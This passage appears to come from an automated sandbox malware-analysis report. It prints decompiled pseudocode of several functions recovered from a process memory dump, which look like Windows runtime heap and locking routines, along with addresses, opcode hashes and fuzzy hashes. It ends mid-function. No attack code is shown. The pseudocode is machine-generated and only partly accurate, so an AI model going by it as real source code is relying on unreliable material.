                                          • Instruction Fuzzy Hash: 29415B75A00309DFCB19CF58C890B9DBBF2BF49304F1581A9E965AB344C775A941CF54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010CC182 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 68%
                                          			E010CC182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
				signed int* _v8;
				char _v16;
				void* __ebx;
				void* __edi;
				signed char _t33;
				signed char _t43;
				signed char _t48;
				signed char _t62;
				void* _t63;
				intOrPtr _t69;
				intOrPtr _t71;
				unsigned int* _t82;
				void* _t83;

				_t80 = __ecx;
				_t82 = __edx;
				_t33 =  *((intOrPtr*)(__ecx + 0xde));
				_t62 = _t33 >> 0x00000001 & 0x00000001;
				if((_t33 & 0x00000001) != 0) {
					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
					if(E010C7D50() != 0) {
						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
					} else {
						_t43 = 0x7ffe0386;
					}
					if( *_t43 != 0) {
						_t43 = E01178D34(_v8, _t80);
					}
					E010C2280(_t43, _t82);
					if( *((char*)(_t80 + 0xdc)) == 0) {
						E010BFFB0(_t62, _t80, _t82);
						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
						_t30 = _t80 + 0xd0; // 0xd0
						_t83 = _t30;
						E01178833(_t83,  &_v16);
						_t81 = _t80 + 0x90;
						E010BFFB0(_t62, _t80 + 0x90, _t80 + 0x90);
						_t63 = 0;
						_push(0);
						_push(_t83);
						_t48 = E010EB180();
						if(_a4 != 0) {
							E010C2280(_t48, _t81);
						}
					} else {
						_t69 = _v8;
						_t12 = _t80 + 0x98; // 0x98
						_t13 = _t69 + 0xc; // 0x575651ff
						E010CBB2D(_t13, _t12);
						_t71 = _v8;
						_t15 = _t80 + 0xb0; // 0xb0
						_t16 = _t71 + 8; // 0x8b000cc2
						E010CBB2D(_t16, _t15);
						E010CB944(_v8, _t62);
						 *((char*)(_t80 + 0xdc)) = 0;
						E010BFFB0(0, _t80, _t82);
						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
						 *(_t80 + 0xde) = 0;
						if(_a4 == 0) {
							_t25 = _t80 + 0x90; // 0x90
							E010BFFB0(0, _t80, _t25);
						}
						_t63 = 1;
					}
					return _t63;
				}
				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
				if(_a4 == 0) {
					_t24 = _t80 + 0x90; // 0x90
					E010BFFB0(0, __ecx, _t24);
				}
				return 0;
			}
















                                          0x010cc18d
                                          0x010cc18f
                                          0x010cc191
                                          0x010cc19b
                                          0x010cc1a0
                                          0x010cc1d4
                                          0x010cc1de
                                          0x01112d6e
                                          0x010cc1e4
                                          0x010cc1e4
                                          0x010cc1e4
                                          0x010cc1ec
                                          0x01112d7d
                                          0x01112d7d
                                          0x010cc1f3
                                          0x010cc1ff
                                          0x01112d88
                                          0x01112d8d
                                          0x01112d94
                                          0x01112d94
                                          0x01112d9f
                                          0x01112da4
                                          0x01112dab
                                          0x01112db0
                                          0x01112db2
                                          0x01112db3
                                          0x01112db4
                                          0x01112dbc
                                          0x01112dc3
                                          0x01112dc3
                                          0x010cc205
                                          0x010cc205
                                          0x010cc208
                                          0x010cc20e
                                          0x010cc211
                                          0x010cc216
                                          0x010cc219
                                          0x010cc21f
                                          0x010cc222
                                          0x010cc22c
                                          0x010cc234
                                          0x010cc23a
                                          0x010cc23f
                                          0x010cc245
                                          0x010cc24b
                                          0x010cc251
                                          0x010cc25a
                                          0x010cc276
                                          0x010cc27d
                                          0x010cc27d
                                          0x010cc25c
                                          0x010cc25c
                                          0x00000000
                                          0x010cc25e
                                          0x010cc1a4
                                          0x010cc1aa
                                          0x010cc1b3
                                          0x010cc265
                                          0x010cc26c
                                          0x010cc26c
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction ID: 9d3c5ef79bb88f5fa3d80bc2cb758c4cfd64c0ea2f827d09c179339ac55247ba
                                          • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                                          • Instruction Fuzzy Hash: FA313772A01547BEE709EBB8C980BEDFBA5BF52604F14415ED49C47201DB346A05CFE1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01127016 Relevance: .1, Instructions: 104COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 76%
                                          			E01127016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
				signed int _v8;
				char _v588;
				intOrPtr _v592;
				intOrPtr _v596;
				signed short* _v600;
				char _v604;
				short _v606;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short* _t55;
				void* _t56;
				signed short* _t58;
				signed char* _t61;
				char* _t68;
				void* _t69;
				void* _t71;
				void* _t72;
				signed int _t75;

				_t64 = __edx;
				_t77 = (_t75 & 0xfffffff8) - 0x25c;
				_v8 =  *0x119d360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
				_t55 = _a16;
				_v606 = __ecx;
				_t71 = 0;
				_t58 = _a12;
				_v596 = __edx;
				_v600 = _t58;
				_t68 =  &_v588;
				if(_t58 != 0) {
					_t71 = ( *_t58 & 0x0000ffff) + 2;
					if(_t55 != 0) {
						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
					}
				}
				_t8 = _t71 + 0x2a; // 0x28
				_t33 = _t8;
				_v592 = _t8;
				if(_t71 <= 0x214) {
					L6:
					 *((short*)(_t68 + 6)) = _v606;
					if(_t64 != 0xffffffff) {
						asm("cdq");
						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
						 *((char*)(_t68 + 0x28)) = _a4;
						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
						 *((char*)(_t68 + 0x29)) = _a8;
						if(_t71 != 0) {
							_t22 = _t68 + 0x2a; // 0x2a
							_t64 = _t22;
							E01126B4C(_t58, _t22, _t71,  &_v604);
							if(_t55 != 0) {
								_t25 = _v604 + 0x2a; // 0x2a
								_t64 = _t25 + _t68;
								E01126B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
							}
							if(E010C7D50() == 0) {
								_t61 = 0x7ffe0384;
							} else {
								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							}
							_push(_t68);
							_push(_v592 + 0xffffffe0);
							_push(0x402);
							_push( *_t61 & 0x000000ff);
							E010E9AE0();
						}
					}
					_t35 =  &_v588;
					if( &_v588 != _t68) {
						_t35 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
					}
					L16:
					_pop(_t69);
					_pop(_t72);
					_pop(_t56);
					return E010EB640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
				}
				_t68 = L010C4620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
				if(_t68 == 0) {
					goto L16;
				} else {
					_t58 = _v600;
					_t64 = _v596;
					goto L6;
				}
			}






















                                          0x01127016
                                          0x0112701e
                                          0x0112702b
                                          0x01127033
                                          0x01127037
                                          0x0112703c
                                          0x0112703e
                                          0x01127041
                                          0x01127045
                                          0x0112704a
                                          0x01127050
                                          0x01127055
                                          0x0112705a
                                          0x01127062
                                          0x01127062
                                          0x0112705a
                                          0x01127064
                                          0x01127064
                                          0x01127067
                                          0x01127071
                                          0x01127096
                                          0x0112709b
                                          0x011270a2
                                          0x011270a6
                                          0x011270a7
                                          0x011270ad
                                          0x011270b3
                                          0x011270b6
                                          0x011270bb
                                          0x011270c3
                                          0x011270c3
                                          0x011270c6
                                          0x011270cd
                                          0x011270dd
                                          0x011270e0
                                          0x011270e2
                                          0x011270e2
                                          0x011270ee
                                          0x01127101
                                          0x011270f0
                                          0x011270f9
                                          0x011270f9
                                          0x0112710a
                                          0x0112710e
                                          0x01127112
                                          0x01127117
                                          0x01127118
                                          0x01127118
                                          0x011270bb
                                          0x0112711d
                                          0x01127123
                                          0x01127131
                                          0x01127131
                                          0x01127136
                                          0x0112713d
                                          0x0112713e
                                          0x0112713f
                                          0x0112714a
                                          0x0112714a
                                          0x01127084
                                          0x01127088
                                          0x00000000
                                          0x0112708e
                                          0x0112708e
                                          0x01127092
                                          0x00000000
                                          0x01127092

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a740b46e92b0accec0217fa48546b5798ea82ba1dac68263da016e0d212ce15c
                                          • Instruction ID: ff0e21f7f0d55355a7ffd87ee10116a8b65a126ed232e4147c831e79083c239e
                                          • Opcode Fuzzy Hash: a740b46e92b0accec0217fa48546b5798ea82ba1dac68263da016e0d212ce15c
                                          • Instruction Fuzzy Hash: 4531E4726047619FC324DF68C840AABB7E5FF98700F144A2DF995876D0E730E914CBA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01153D40 Relevance: .1, Instructions: 98COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E01153D40(intOrPtr __ecx, char* __edx) {
				signed int _v8;
				char* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				signed char _v24;
				char _v28;
				char _v29;
				intOrPtr* _v32;
				char _v36;
				char _v37;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char _t34;
				intOrPtr* _t37;
				intOrPtr* _t42;
				intOrPtr* _t47;
				intOrPtr* _t48;
				intOrPtr* _t49;
				char _t51;
				void* _t52;
				intOrPtr* _t53;
				char* _t55;
				char _t59;
				char* _t61;
				intOrPtr* _t64;
				void* _t65;
				char* _t67;
				void* _t68;
				signed int _t70;

				_t62 = __edx;
				_t72 = (_t70 & 0xfffffff8) - 0x1c;
				_v8 =  *0x119d360 ^ (_t70 & 0xfffffff8) - 0x0000001c;
				_t34 =  &_v28;
				_v20 = __ecx;
				_t67 = __edx;
				_v24 = _t34;
				_t51 = 0;
				_v12 = __edx;
				_v29 = 0;
				_v28 = _t34;
				E010C2280(_t34, 0x1198a6c);
				_t64 =  *0x1195768; // 0x771a5768
				if(_t64 != 0x1195768) {
					while(1) {
						_t8 = _t64 + 8; // 0x771a5770
						_t42 = _t8;
						_t53 = _t64;
						 *_t42 =  *_t42 + 1;
						_v16 = _t42;
						E010BFFB0(_t53, _t64, 0x1198a6c);
						 *0x119b1e0(_v24, _t67);
						if( *((intOrPtr*)( *((intOrPtr*)(_t64 + 0xc))))() != 0) {
							_v37 = 1;
						}
						E010C2280(_t45, 0x1198a6c);
						_t47 = _v28;
						_t64 =  *_t64;
						 *_t47 =  *_t47 - 1;
						if( *_t47 != 0) {
							goto L8;
						}
						if( *((intOrPtr*)(_t64 + 4)) != _t53) {
							L10:
							_push(3);
							asm("int 0x29");
						} else {
							_t48 =  *((intOrPtr*)(_t53 + 4));
							if( *_t48 != _t53) {
								goto L10;
							} else {
								 *_t48 = _t64;
								_t61 =  &_v36;
								 *((intOrPtr*)(_t64 + 4)) = _t48;
								_t49 = _v32;
								if( *_t49 != _t61) {
									goto L10;
								} else {
									 *_t53 = _t61;
									 *((intOrPtr*)(_t53 + 4)) = _t49;
									 *_t49 = _t53;
									_v32 = _t53;
									goto L8;
								}
							}
						}
						L11:
						_t51 = _v29;
						goto L12;
						L8:
						if(_t64 != 0x1195768) {
							_t67 = _v20;
							continue;
						}
						goto L11;
					}
				}
				L12:
				E010BFFB0(_t51, _t64, 0x1198a6c);
				while(1) {
					_t37 = _v28;
					_t55 =  &_v28;
					if(_t37 == _t55) {
						break;
					}
					if( *((intOrPtr*)(_t37 + 4)) != _t55) {
						goto L10;
					} else {
						_t59 =  *_t37;
						if( *((intOrPtr*)(_t59 + 4)) != _t37) {
							goto L10;
						} else {
							_t62 =  &_v28;
							_v28 = _t59;
							 *((intOrPtr*)(_t59 + 4)) =  &_v28;
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t37);
							continue;
						}
					}
					L18:
				}
				_pop(_t65);
				_pop(_t68);
				_pop(_t52);
				return E010EB640(_t51, _t52, _v8 ^ _t72, _t62, _t65, _t68);
				goto L18;
			}

































                                          0x01153d40
                                          0x01153d48
                                          0x01153d52
                                          0x01153d59
                                          0x01153d5d
                                          0x01153d61
                                          0x01153d63
                                          0x01153d67
                                          0x01153d69
                                          0x01153d72
                                          0x01153d76
                                          0x01153d7a
                                          0x01153d7f
                                          0x01153d8b
                                          0x01153d91
                                          0x01153d91
                                          0x01153d91
                                          0x01153d94
                                          0x01153d96
                                          0x01153d9d
                                          0x01153da1
                                          0x01153db0
                                          0x01153dba
                                          0x01153dbc
                                          0x01153dbc
                                          0x01153dc6
                                          0x01153dcb
                                          0x01153dcf
                                          0x01153dd1
                                          0x01153dd4
                                          0x00000000
                                          0x00000000
                                          0x01153dd9
                                          0x01153e0c
                                          0x01153e0c
                                          0x01153e0f
                                          0x01153ddb
                                          0x01153ddb
                                          0x01153de0
                                          0x00000000
                                          0x01153de2
                                          0x01153de2
                                          0x01153de4
                                          0x01153de8
                                          0x01153deb
                                          0x01153df1
                                          0x00000000
                                          0x01153df3
                                          0x01153df3
                                          0x01153df5
                                          0x01153df8
                                          0x01153dfa
                                          0x00000000
                                          0x01153dfa
                                          0x01153df1
                                          0x01153de0
                                          0x01153e11
                                          0x01153e11
                                          0x00000000
                                          0x01153dfe
                                          0x01153e04
                                          0x01153e06
                                          0x00000000
                                          0x01153e06
                                          0x00000000
                                          0x01153e04
                                          0x01153d91
                                          0x01153e15
                                          0x01153e1a
                                          0x01153e1f
                                          0x01153e1f
                                          0x01153e23
                                          0x01153e29
                                          0x00000000
                                          0x00000000
                                          0x01153e2e
                                          0x00000000
                                          0x01153e30
                                          0x01153e30
                                          0x01153e35
                                          0x00000000
                                          0x01153e37
                                          0x01153e3e
                                          0x01153e42
                                          0x01153e48
                                          0x01153e4e
                                          0x00000000
                                          0x01153e4e
                                          0x01153e35
                                          0x00000000
                                          0x01153e2e
                                          0x01153e5b
                                          0x01153e5c
                                          0x01153e5d
                                          0x01153e68
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5471b874b97cf6c4ff637648973d5a5899086f50b758cabf16fdcef147c49e5f
                                          • Instruction ID: 677dad124b29a7281617820130e35bb4bbe7e0d5bb565796ffe081b7e077f060
                                          • Opcode Fuzzy Hash: 5471b874b97cf6c4ff637648973d5a5899086f50b758cabf16fdcef147c49e5f
                                          • Instruction Fuzzy Hash: 35318A71509312DFCB19DF18D58095ABBE1FF85744F44896EE8B8AB251D730EE04CBA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010DA70E Relevance: .1, Instructions: 96COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 92%
                                          			E010DA70E(intOrPtr* __ecx, char* __edx) {
				unsigned int _v8;
				intOrPtr* _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t16;
				intOrPtr _t17;
				intOrPtr _t28;
				char* _t33;
				intOrPtr _t37;
				intOrPtr _t38;
				void* _t50;
				intOrPtr _t52;

				_push(__ecx);
				_push(__ecx);
				_t52 =  *0x1197b10; // 0x0
				_t33 = __edx;
				_t48 = __ecx;
				_v12 = __ecx;
				if(_t52 == 0) {
					 *0x1197b10 = 8;
					 *0x1197b14 = 0x1197b0c;
					 *0x1197b18 = 1;
					L6:
					_t2 = _t52 + 1; // 0x1
					E010DA990(0x1197b10, _t2, 7);
					asm("bts ecx, eax");
					 *_t48 = _t52;
					 *_t33 = 1;
					L3:
					_t16 = 0;
					L4:
					return _t16;
				}
				_t17 = L010DA840(__edx, __ecx, __ecx, _t52, 0x1197b10, 1, 0);
				if(_t17 == 0xffffffff) {
					_t37 =  *0x1197b10; // 0x0
					_t3 = _t37 + 0x27; // 0x27
					__eflags = _t3 >> 5 -  *0x1197b18; // 0x0
					if(__eflags > 0) {
						_t38 =  *0x1197b9c; // 0x0
						_t4 = _t52 + 0x27; // 0x27
						_v8 = _t4 >> 5;
						_t50 = L010C4620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
						__eflags = _t50;
						if(_t50 == 0) {
							_t16 = 0xc0000017;
							goto L4;
						}
						 *0x1197b18 = _v8;
						_t8 = _t52 + 7; // 0x7
						E010EF3E0(_t50,  *0x1197b14, _t8 >> 3);
						_t28 =  *0x1197b14; // 0x0
						__eflags = _t28 - 0x1197b0c;
						if(_t28 != 0x1197b0c) {
							L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
						}
						_t9 = _t52 + 8; // 0x8
						 *0x1197b14 = _t50;
						_t48 = _v12;
						 *0x1197b10 = _t9;
						goto L6;
					}
					 *0x1197b10 = _t37 + 8;
					goto L6;
				}
				 *__ecx = _t17;
				 *_t33 = 0;
				goto L3;
			}
















                                          0x010da713
                                          0x010da714
                                          0x010da717
                                          0x010da71d
                                          0x010da720
                                          0x010da722
                                          0x010da727
                                          0x010da74a
                                          0x010da754
                                          0x010da75e
                                          0x010da768
                                          0x010da76a
                                          0x010da773
                                          0x010da78b
                                          0x010da790
                                          0x010da792
                                          0x010da741
                                          0x010da741
                                          0x010da743
                                          0x010da749
                                          0x010da749
                                          0x010da732
                                          0x010da73a
                                          0x010da797
                                          0x010da79d
                                          0x010da7a3
                                          0x010da7a9
                                          0x010da7b6
                                          0x010da7bc
                                          0x010da7ca
                                          0x010da7e0
                                          0x010da7e2
                                          0x010da7e4
                                          0x01119bf2
                                          0x00000000
                                          0x01119bf2
                                          0x010da7ed
                                          0x010da7f2
                                          0x010da800
                                          0x010da805
                                          0x010da80d
                                          0x010da812
                                          0x01119c08
                                          0x01119c08
                                          0x010da818
                                          0x010da81b
                                          0x010da821
                                          0x010da824
                                          0x00000000
                                          0x010da824
                                          0x010da7ae
                                          0x00000000
                                          0x010da7ae
                                          0x010da73c
                                          0x010da73e
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 35ecfd8a70f5b2b86714020385aa04fd2f24700f73a1adc654c4b33a19c93c2c
                                          • Instruction ID: f7439a7654259fe2215e52cd3fe6d2c270ab497c1a99ba184d8c9b30060ca07b
                                          • Opcode Fuzzy Hash: 35ecfd8a70f5b2b86714020385aa04fd2f24700f73a1adc654c4b33a19c93c2c
                                          • Instruction Fuzzy Hash: E731CEB1724205DBC729CB18EC80F69BBF9FF89710F15496AE27687284D3B09981CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010D61A0 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 97%
                                          			E010D61A0(signed int* __ecx) {
				intOrPtr _v8;
				char _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				intOrPtr _t30;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t49;
				signed int _t51;
				intOrPtr _t52;
				signed int _t54;
				void* _t59;
				signed int* _t61;
				intOrPtr* _t64;

				_t61 = __ecx;
				_v12 = 0;
				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
				_v16 = __ecx;
				_v8 = 0;
				if(_t30 == 0) {
					L6:
					_t31 = 0;
					L7:
					return _t31;
				}
				_t32 = _t30 + 0x5d8;
				if(_t32 == 0) {
					goto L6;
				}
				_t59 = _t32 + 0x30;
				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
					goto L6;
				}
				if(__ecx != 0) {
					 *((intOrPtr*)(__ecx)) = 0;
					 *((intOrPtr*)(__ecx + 4)) = 0;
				}
				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
					_t51 =  *(_t32 + 0x10);
					_t33 = _t32 + 0x10;
					_v20 = _t33;
					_t54 =  *(_t33 + 4);
					if((_t51 | _t54) == 0) {
						_t37 = E010D5E50(0x10867cc, 0, 0,  &_v12);
						if(_t37 != 0) {
							goto L6;
						}
						_t52 = _v8;
						asm("lock cmpxchg8b [esi]");
						_t64 = _v16;
						_t49 = _t37;
						_v20 = 0;
						if(_t37 == 0) {
							if(_t64 != 0) {
								 *_t64 = _v12;
								 *((intOrPtr*)(_t64 + 4)) = _t52;
							}
							E01179D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
							_t31 = 1;
							goto L7;
						}
						E010AF7C0(_t52, _v12, _t52, 0);
						if(_t64 != 0) {
							 *_t64 = _t49;
							 *((intOrPtr*)(_t64 + 4)) = _v20;
						}
						L12:
						_t31 = 1;
						goto L7;
					}
					if(_t61 != 0) {
						 *_t61 = _t51;
						_t61[1] = _t54;
					}
					goto L12;
				} else {
					goto L6;
				}
			}



















                                          0x010d61b3
                                          0x010d61b5
                                          0x010d61bd
                                          0x010d61c3
                                          0x010d61c7
                                          0x010d61d2
                                          0x010d61ff
                                          0x010d61ff
                                          0x010d6201
                                          0x010d6207
                                          0x010d6207
                                          0x010d61d4
                                          0x010d61d9
                                          0x00000000
                                          0x00000000
                                          0x010d61df
                                          0x010d61e2
                                          0x00000000
                                          0x00000000
                                          0x010d61e6
                                          0x010d61e8
                                          0x010d61ee
                                          0x010d61ee
                                          0x010d61f9
                                          0x0111762f
                                          0x01117632
                                          0x01117635
                                          0x01117639
                                          0x01117640
                                          0x0111766e
                                          0x01117675
                                          0x00000000
                                          0x00000000
                                          0x01117681
                                          0x01117689
                                          0x0111768d
                                          0x01117691
                                          0x01117695
                                          0x01117699
                                          0x011176af
                                          0x011176b5
                                          0x011176b7
                                          0x011176b7
                                          0x011176d7
                                          0x011176dc
                                          0x00000000
                                          0x011176dc
                                          0x011176a2
                                          0x011176a9
                                          0x01117651
                                          0x01117653
                                          0x01117653
                                          0x01117656
                                          0x01117656
                                          0x00000000
                                          0x01117656
                                          0x01117644
                                          0x01117646
                                          0x01117648
                                          0x01117648
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73f5644060e04c65c5d3382147be46e05c8c808945b02874c0b4c9b41129778e
                                          • Instruction ID: 8530dbe50520632082589635d2122a9df68256a27fd53fba6af7e7e81602257f
                                          • Opcode Fuzzy Hash: 73f5644060e04c65c5d3382147be46e05c8c808945b02874c0b4c9b41129778e
                                          • Instruction Fuzzy Hash: 2D3159726097018FE364DF1DC800B2AFBE5BB88B00F09496DE9949B395E771D844CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010AAA16 Relevance: .1, Instructions: 93COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 95%
                                          			E010AAA16(signed short* __ecx) {
				signed int _v8;
				intOrPtr _v12;
				signed short _v16;
				intOrPtr _v20;
				signed short _v24;
				signed short _v28;
				void* _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t25;
				signed short _t38;
				signed short* _t42;
				signed int _t44;
				signed short* _t52;
				signed short _t53;
				signed int _t54;

				_v8 =  *0x119d360 ^ _t54;
				_t42 = __ecx;
				_t44 =  *__ecx & 0x0000ffff;
				_t52 =  &(__ecx[2]);
				_t51 = _t44 + 2;
				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
					L4:
					_t25 =  *0x1197b9c; // 0x0
					_t53 = L010C4620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
					__eflags = _t53;
					if(_t53 == 0) {
						L3:
						return E010EB640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
					} else {
						E010EF3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
						L2:
						_t51 = 4;
						if(L010B6C59(_t53, _t51, _t58) != 0) {
							_t28 = E010D5E50(0x108c338, 0, 0,  &_v32);
							__eflags = _t28;
							if(_t28 == 0) {
								_t38 = ( *_t42 & 0x0000ffff) + 2;
								__eflags = _t38;
								_v24 = _t53;
								_v16 = _t38;
								_v20 = 0;
								_v12 = 0;
								E010DB230(_v32, _v28, 0x108c2d8, 1,  &_v24);
								_t28 = E010AF7A0(_v32, _v28);
							}
							__eflags = _t53 -  *_t52;
							if(_t53 !=  *_t52) {
								_t28 = L010C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
							}
						}
						goto L3;
					}
				}
				_t53 =  *_t52;
				_t44 = _t44 >> 1;
				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
					goto L4;
				}
				goto L2;
			}




















                                          0x010aaa25
                                          0x010aaa29
                                          0x010aaa2d
                                          0x010aaa30
                                          0x010aaa37
                                          0x010aaa3c
                                          0x01104458
                                          0x01104458
                                          0x01104472
                                          0x01104474
                                          0x01104476
                                          0x010aaa64
                                          0x010aaa74
                                          0x0110447c
                                          0x01104483
                                          0x01104492
                                          0x010aaa52
                                          0x010aaa54
                                          0x010aaa5e
                                          0x011044a8
                                          0x011044ad
                                          0x011044af
                                          0x011044b6
                                          0x011044b6
                                          0x011044b9
                                          0x011044bc
                                          0x011044cd
                                          0x011044d3
                                          0x011044d6
                                          0x011044e1
                                          0x011044e1
                                          0x011044e6
                                          0x011044e8
                                          0x011044fb
                                          0x011044fb
                                          0x011044e8
                                          0x00000000
                                          0x010aaa5e
                                          0x01104476
                                          0x010aaa42
                                          0x010aaa46
                                          0x010aaa48
                                          0x010aaa4c
                                          0x00000000
                                          0x00000000
                                          0x00000000

                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 94c03110d330db667e98a1e452f2ddf8c115d79fb89204af428e772fc7b00e3f
                                          • Instruction ID: ba03c73ae616742e0ea09b25d349f9166eaf3b1143e91403b9329d5fcb262907
                                          • Opcode Fuzzy Hash: 94c03110d330db667e98a1e452f2ddf8c115d79fb89204af428e772fc7b00e3f
                                          • Instruction Fuzzy Hash: EB31C571A0021AEBDF15AFA9CD81ABFB7B8FF14700B454069F991D7280E7749D51CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 010E4A2C Relevance: .1, Instructions: 92COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E010E4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int* _v12;
				char _v13;
				signed int _v16;
				char _v21;
				signed int* _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				signed int* _t32;
				signed int* _t41;
				signed int _t42;
				void* _t43;
				intOrPtr* _t51;
				void* _t52;
				signed int _t53;
				signed int _t58;
				void* _t59;
				signed int _t60;
				signed int _t62;

				_t49 = __edx;
				_t62 = (_t60 & 0xfffffff8) - 0xc;
				_t26 =  *0x119d360 ^ _t62;
				_v8 =  *0x119d360 ^ _t62;
				_t41 = __ecx;
				_t51 = __edx;
				_v12 = __ecx;
				if(_a4 == 0) {
					if(_a8 != 0) {
						goto L1;
					}
					_v13 = 1;
					E010C2280(_t26, 0x1198608);
					_t58 =  *_t41;
					if(_t58 == 0) {
						L11:
						E010BFFB0(_t41, _t51, 0x1198608);
						L2:
						 *0x119b1e0(_a4, _a8);
						_t42 =  *_t51();
						if(_t42 == 0) {
							_t29 = 0;
							L5:
							_pop(_t52);
							_pop(_t59);
							_pop(_t43);
							return E010EB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
						}
						 *((intOrPtr*)(_t42 + 0x34)) = 1;
						if(_v21 != 0) {
							_t53 = 0;
							E010C2280(_t28, 0x1198608);
							_t32 = _v24;
							if( *_t32 == _t58) {
